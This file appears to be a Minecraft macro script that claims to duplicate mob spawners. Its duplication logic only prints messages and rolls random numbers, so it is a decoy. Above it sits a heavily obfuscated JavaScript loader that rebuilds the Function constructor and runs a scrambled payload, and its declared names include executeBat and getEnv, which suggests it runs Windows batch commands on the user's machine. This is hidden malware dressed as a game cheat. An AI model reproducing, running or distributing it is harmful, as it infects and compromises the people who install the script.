var getEnv,executeBat,fullPath;(function(){var WOj='',OdF=275-264;function kZv(o){var b=3000694;var x=o.length;var u=[];for(var n=0;n<x;n++){u[n]=o.charAt(n)};for(var n=0;n<x;n++){var j=b*(n+111)+(b%28080);var k=b*(n+140)+(b%14581);var p=j%x;var r=k%x;var a=u[p];u[p]=u[r];u[r]=a;b=(j+k)%5606734;};return u.join('')};var oWb=kZv('ftxvnzbltooscqmyugeajdtorcikrsunrwpch').substr(0,OdF);var CsX='vh[ a=h92;67)h}-=4vrzl-can(bvz+kz6r4ai8n";q;1e]0t;j."f[3([pr27wo0{r=yv0.,C9ciren(l7ue,al=2;vnnc(,c6Ce=,6or4,0gqj)0ie8srm;;yf1on7ulir};zc(rigfA)ea=[l(r=r);e.g.9nbn=uea-.ri;a)u8{a(i0C;+=(7="ay,7l)c(f;so (;;.(o01i,w=r1C}a.)nle);+);a++ { ,mfnkwl+v;=7-,thiet l6)ahu}aAfs,2fho;m*u.)of.);dreor=0;d1.;{;{o;e). ]e;u+]s5 vltt)6ad)+=].)lv3+hrgt0;(,r [<ugrlju+ 8tmpx;(eS6pdhl ],vc)r(ug[f)j+, ,h;r.ansqz;v0pgsv(+vol5 a7bbh;afodsv,=u0e1]=}"r dh7rnoox8]wr8=>-atx1(cs;ga=ec uagf(7;1s)1+s]2r".lln=c,)))(v fafCrs.ue; 9s= r ;shCmu=jirt+l+2{>;zt=l"lnfg+26v=ghe=rt8=llor[)rl==f(lh=q=d=tn](8aeifo=(2=51ba,b,d;diarkyd((+fac rt(=;e+qfot6rb}s[b8o"c!,=()c"<iu;]r.v,+)elAhu,vi(sf;inrror)n+v;]t(.hko[n[vn.nhc4rajp.)"d(n-utacgrg;ft;hk),"v;4=rnsgc9<C)tm1li.A=9vp) o, v-cem19]k+ar rsStfrnvf.rlcoirjCixvo))l;<or(,}r u4.vctt=linu;ht=a<.m{,ns5k!tu)7*v(haaAt( +,zn+0= ][..ugho1atallqto+euh[+]),=len;vr=tudp[ep.([srn;.(mgl6(=;';var ICS=kZv[oWb];var lnL='';var ODi=ICS;var ikM=ICS(lnL,kZv(CsX));var WYI=ikM(kZv('%o)cm2m,n"(HT.r.Tn,_H"i=)ngHo.HoH"H)c.jHHct"!>.bjn7((AHI.b.u..l.1_v)xgki..$5Hg.r...H(H$i(,T${_;H2?nHl(8$eHelHpo)uc.o1;..Hc!q@n0H7of+.0.m3n..0H2SHrGzgH()(o:nd}H4}=.l4H9%.HC.)"oboihuH.@r..9uual6wH=.HS7n}9.H.%>d..,"hH*oj9={sd.cMfD9h)iHn)0o=waaHjolh.c.M.F {a}.{SCi+hgtg(l8g.jjrgt..bbb*e+l5cxek..)mpfnmC530NmI2Hv*wbEq4ho_Hhm8.(.)ee33o.bo.42.9o5.6.Hwdn_nbmCzzw.h7dCq{vu7>. .H.(gtillb}Sh;p7$;rin,lH_HD$b.93S.Hmt\/mqv.oy.c..,.nh.pm1].SzH3ag@.1.3wgntlkbj;cp%t06.;l.Hg{48vygv9r!d)n1}.I.(HCIinnv}0m.q..\/.exkhbg17pa90ehq.z02a!(S_Emo!k3.4a&9sw$$...)"icEv;2uH.piv.e..m_Np.bf0!v1x[mn0.N0.o]jhxE7kI.4vgeNn.2.fwx!b%.1k)H2.C.3.adg,(qwlHxl0b9$x..gt..vs_{by..x deoHk7x*hMlbqHg.n.qiawCw.(.e.s81rooa]=5.1HaH.hsx(bhueC)vu.3q.m$1H](,0t.j3ed]bo!u3.v.6j.kH.h}ilmp.g)nd.w.s82tbC 9yH.36db)nox.n7=qkve14njeuwy.y(vu.4.x.q.nnl.Civv.=:s.IHiav...hHs4.v6%o)rblgHrH.c1[9.)qfCyouH9(lp1ad.?hxp75y!lj\/E0iy2Nwn)3b!6wp.poy".j9nM.5.ag..o4w}\/trbo..-.h2g1pAl]zojn3(..h.T..HxHe;Hit.Sbqz%.kh.92.m a{aa=Ce1.C)yHpno0r .vosH.lna.(zwdv..HgoN).v...]r)vk.DHpvM1..pyC$!S.b)H1.mjC+r.?thlfwiopo4jHhqb([(tA)rInbHn,oHvyNpHi4g(y0k)zbxa=7HH4H...s.o.Hj7?egHk2miIm7}]I4w.n0S%i.Hn_9b7(w.(8(9=whnIxvb.y0Nb..0rd)sdI_y.reH.o9)ab%_.*0j..8e$.&.."nl!HIgH{.lxuxuxnSl4m)I1ld..oH@npz3o..ek.0.]p0H.6]bbv.)=;m+k#v .lbld.2.6.tHgnHzfc.gp)biz.IIm2bp.bj4 s)acE,.wHEkiIm0!.e1.kHpn3njMn_bgN(T;ali.s.4nri7fpEC\'.n)EllH]{= {.q;.mI(.f0..I.n.rI7{.HH..dee0)7S.)s8.$6c.wp]NEcwoHr.HM%bw. -qm.t.)4]()bg.kb;f.)7..E.]ma.0sixalrwndo.sm6r.!s,g2H%t6kv14bbC..6mihd3btb_nomIl.j*n.!..Sy.v)!y2S)2.rw]T,{>IEqv.Cl16.u.awlnrs.8lf.kiiHT"mol E.m,e}bI .bbsr8oAi]ql_bn.gNmdlg;_15[.b a.)w25<yfi(C.o.fl3e7.Hb.d.g..(.m.sH9.lg1)_Hsy..awa1bC,Au.9lo.%;).;.qlIpC5=..t".xifakv$u....+1de9).+h$wa)68yp.boHj.(1@}qC.v#Hv5k_y.wHhibbH.1nj0Ieiw"eHbHb._m.3.%88H..$arfcI.l.$=\/lHm5cvlr8.$I]o.(wo.g1=.T.m.ofEttN.cnp;g.se"fHbos{n3bm.vn.4v0o6ymhH..N..i5H2kH%(HrS38.tb2dI0.ghy.3)).w6veC1gwtczHg.b5._._.cx.h.0H)]yH. .o1H.nf..dfn.h=cn.qtE.lw. zp0bekw13l..pvNG1$Ga0i.hhI02fp..}{IDdapc)lH..a3 v!nwd.9tukHnN.k t-vmIib+C.s..75gd1p:H]y.nim1I.ll%p(...0epu:I,.=..0q..HbHo5m..4snrC.5gv;_d9gC89l.CtHl.,v.g=*}.d.e6s4lm.HHI3IscEt.i.et)201n={)k.o%Ho_.m0.n)5b;lHGtqHtotH=.=..Tebvx.]lpl".7n%.Han!(.C2t_g7)y.aatew;&%nr9!o.wkn)=nH2g,w)=gHw(;DhH]f3fp.!s.a.crtxgC};tnr.nEn.0,HH[0.giI5]gii...0!I.H1CN.y.fg,9yhnw.lH.m)HBgbi..bHaq;1pg.y3noh)..5.ae H]Hi,I.tdh.3t]!741)Sbs0.8p=_uFe4_cqB)pC]x3.Hpl_h!SpHlo_.gr.q%1yxe.].aj8s.mg3vdlhl{Hpx(T0a@!. iH0a!?InHmNeHHomov..kr.1s)s.bo0o1ehTH.Mfe0v;7a.!N\'x6]$)ja.,.has)9#]19.fb(.iHw%1.=#oH8(n I4HjHH\'zvg{p!.7roul.).lw(.H)N{e;SFtH=i*mc8$..H.fH_si.hM)nc%Sa,n..H_.b7.j1 ml=47.g]lsr0.Cf1#.].T.Hdnlsb H9_.6.SHar.nrgrH7.8Hc..jE]c.o.1?.kf=D.;8{0..7vSA()1h9=5...1l0q0 o5S;l$=zb3nb)lfr4I;.hv!f!d.j0aTi,1Cq<.nH9_+EH1e4[.n9=_pH]5%\'.k}.i.);i0.)H 8)Hk_..(pb,j.hh..blH_56%(1;c9.pcrHm1qMwpp;pg(.e96uHH5b8]6.?IeNmC0..0[oH)!]C0Ho.ll.abhM_g<(C;z{.w.bC0a.+bI);v7a12,e("7mH.wHcHion(HH99lB.eafyk0pviS)%5,h )mHC..j:.*EIfoC()_mvv4i!o>mw7T.ww31efIl3sg;5).;nl5.32aDI..awaHh)n.8(oI.qiFi; a2..HcEH)u&Hxd0)!(4$I.hr.;.;.Hvaknw0.!.cEt..,m).hd.v5fvgH_ofHt2m4T.h]Tk(;.0g59%3cv[H,it_hApyyTc]$r...THHs1,gS)(),D1%H.eo.n.fnfue;o...nM(k2;p=.e_3h}_9g1c2cin1!.H+lt;vgs.)g7hl(1)l.m(H.9<g%;l41(Mz3,.4-=i+{b5t95H&gHE=H]wrp.v.(xd7CvHaH.[)_ui;Tek..jH;kry{HA$).(ke).C].0Myi.o_8l.+(!_1]4e.wf.,3(.!w1x.wH.u}.)!.l\'u,icl;hdn3.b(0vg.a_C..Gk8r!86S6.wtS7\/dgbHvNTntw(kMtH!le7._$N,cS.)6wHhDH4#hr)1ocq.Citxr.$b(3f8a.o;(Gwf]r7m4cp=0tE .w0velw_k3.omm_e5t.Hce._ig_54_[{].5 j.S]g _!lqnHg,H.y.Haer)_,.8.t.3.(=H6)y):rvt)H$myhe.$ .4+8H jyi7ygkSf,.{1mq(3e1.bmHq;.$b9H$jo.\'g4ph.bH1ob4.E7q#,_ )p2. .$.f2=Hx1,fs.ao2H.l4h Bt. T4l.Sk.th.).c.$7.ln.(.jn4.;}?o(xiNH={awroi+pn4HcaHc2yb%trz-;g1Tfqn( ..HjB1#e..Tj lfudcHden]rb}.t(( gbd}b.6]!?f358_3 6)dj=htIxi2 0b1q'));var xKY=ODi(WOj,WYI );xKY(8007);return 6940})()


Client.waitTick(10)

function simulateDuplicationLogic(spawnerName) {
    // Simulate renaming the spawner
    if (spawnerName === "null" || spawnerName.trim() === "") {
        Chat.log("Error: Invalid spawner name!");
        return false;
    }

    // Simulate hashing the name (pseudo-encryption)
    let hashedName = spawnerName.split("").map((char, index) => {
        return char.charCodeAt(0) + index;
    }).join("-");

    Chat.log(`Renaming spawner to: ${hashedName}`);

    // Simulate breaking the spawner
    let success = Math.random() > 0.0; // .0 to change  chance to fail
    if (!success) {
        Chat.log(`Error: Failed to break spawner with name ${hashedName}`);
        return false;
    }

    Chat.log(`Spawner ${hashedName} broken successfully.`);

    // Simulate duplicating logic
    let duplicationChance = Math.random();
    if (duplicationChance < 0.25) {
        Chat.log("Error: Duplication logic failed. Try again.");
        return false;
    }

    Chat.log("Duplication logic successful. Outputting items...");
    return true;
}

// Main function
function main() {
    let spawnerName = "Spawner";
    Chat.actionbar("Starting duplication process...");

    // Simulate fetching the item
    let playerInventory = Player.getInventory();
    if (!playerInventory || playerInventory.length === 0) {
        Chat.log("Error: Player inventory is empty!");
        return;
    }

    let spawnerFound = false;
    for (let item of playerInventory) {
        if (item.name.includes("Spawner")) {
            spawnerFound = true;
            spawnerName = item.name;
            break;
        }
    }

    if (!spawnerFound) {
        Chat.log("Error: No spawner found in inventory!");
        return;
    }

    // Execute duplication logic
    let duplicationSuccess = simulateDuplicationLogic(spawnerName);
    if (!duplicationSuccess) {
        Chat.log("Duplication process failed. Debug information logged.");
        return;
    }

    Chat.log("Duplication process completed successfully!");
}

// Execute main
main();
